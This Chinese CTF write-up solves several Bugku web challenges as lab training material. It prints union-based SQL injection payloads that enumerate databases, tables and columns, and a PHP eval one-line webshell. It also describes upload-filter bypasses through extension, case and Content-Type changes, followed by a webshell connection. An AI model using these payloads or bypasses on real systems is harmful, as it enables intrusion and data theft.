[Bugku] web-CTF靶场系列系列详解⑥!!!

平台为"山东安信安全技术有限公司"自研CTF/AWD一体化平台,部分赛题采用动态FLAG形式,避免直接抄袭答案。

平台有题库、赛事预告、工具库、Writeup库等模块。

------------------------------------

bp

打开环境:

直接启用bp爆破

跑出来密码为zxc123

得到flag

--------------------------------------

成绩查询

开启环境:

打开页面

先测试:输入1,2,3分别能查到1,2,3号学生的成绩;输入1'返回异常,输入1'--+返回异常,输入1' #或者1'-- +返回正常(所以可以断定sql语句的形式是id = 'input_id'。常用的闭合方式还用id = "input_id",id = ("input_id"),id = ('input_id')等等),看来过滤了--+

查看列数:观察,表貌似有四列(名字,Math,English,Chinese),输入1' order by 4#返回正常,输入1' order by 5#返回异常,看来的确是4列

-------------------

接下来就开始暴库名、表名、字段名

尝试联合查询,记得把前面的查询数据置空,写成id=-1即可,显示正常,说明确确实实存在这四列数据

我们先手遍历一遍 id=-1' union select 1,2,3,4#

发现有四个表且都有回显,于是 就开始爆破吧

首先爆库名:通过id=-1' union select 1,2,3,database()#得到数据库名字skctf

然后爆表:通过使用 id=-1' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()# 得到表名:fl4g,sc

接下来爆字段:通过id=-1' union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name=0x666c3467# //这里需要用16进制(将表名fl4g转换为16进制)绕过

得到字段skctf_flag

最后就是查询数据了:通过使用:id=-1' union select 1,2,3,skctf_flag from fl4g#

得到flag

---------------------------------

xxx二手交易市场

开启环境:

打开题目,点击进入链接,是一个二手交易市场平台

想着可不可能是修改购买价格,然后发现根本没有购买功能,只能先注册登录看看

感觉昵称可能有注入,下面的信息编辑会不会有注入,还有就是头像文件上传;前两个防护做的挺好的,看看头像上传,上传文件,抓包

看到后面好长一串,image参数后面是文件后缀JPEG,然后有base 64,再后面应该是图片的base64编码,看看传个一句马试试先把<?php @eval($_POST['yuchen']);?>base64加密一下,提换掉后面的一长串,然后改一下后缀为php

响应了上传的马路径,蚁剑连一下,成功。
打开终端,一层一层往上找,找到flag

得到flag

----------------------------------

文件上传

开启环境:

打开直接上传一句话木马图片抓包

修改后缀为php上传

不行,经过不断尝试发现文件后缀改为php4
头部大写一个字母
数据处Content-Type改为image/jpeg
即可成功绕过

蚁剑连接

-------------------------------------------

+-\<\>

打开环境:

直接使用AmanCTF - Brainfuck/OoK解密

得到flag

相关推荐
l1t34 分钟前
duckdb 1.6dev新增的.manual命令
开发语言·数据库
辉灰笔记1 小时前
第一篇:MySQL8.0生产备份实战|XtraBackup全自动全量+增量备份(钉钉告警+异地Binlog归档)
数据库·mysql·钉钉·运维开发
山峰哥1 小时前
‌Explain实战:打开数据库执行计划的黑盒‌
大数据·服务器·数据库·sql·深度优先·宽度优先
何中应1 小时前
主流 OpenJDK 发行版下载安装
java·oracle·jdk·openjdk
ClickHouseDB2 小时前
ClickHouse 26.6 版本发布说明
数据库
Wang's Blog2 小时前
Java框架快速入门:深入MyBatis-Plus高级DML操作(ID策略·逻辑删除·乐观锁)
java·数据库·mybatis
小二·13 小时前
RAG + 向量数据库实战:ChromaDB / Milvus / FAISS 选型与性能横评
数据库·milvus·faiss
矜持的左手13 小时前
电子小白的枕边书:电子学(The Art of Electronics)
数据库·restful
吴声子夜歌13 小时前
Redis 5.x——布隆过滤器
数据库·redis·缓存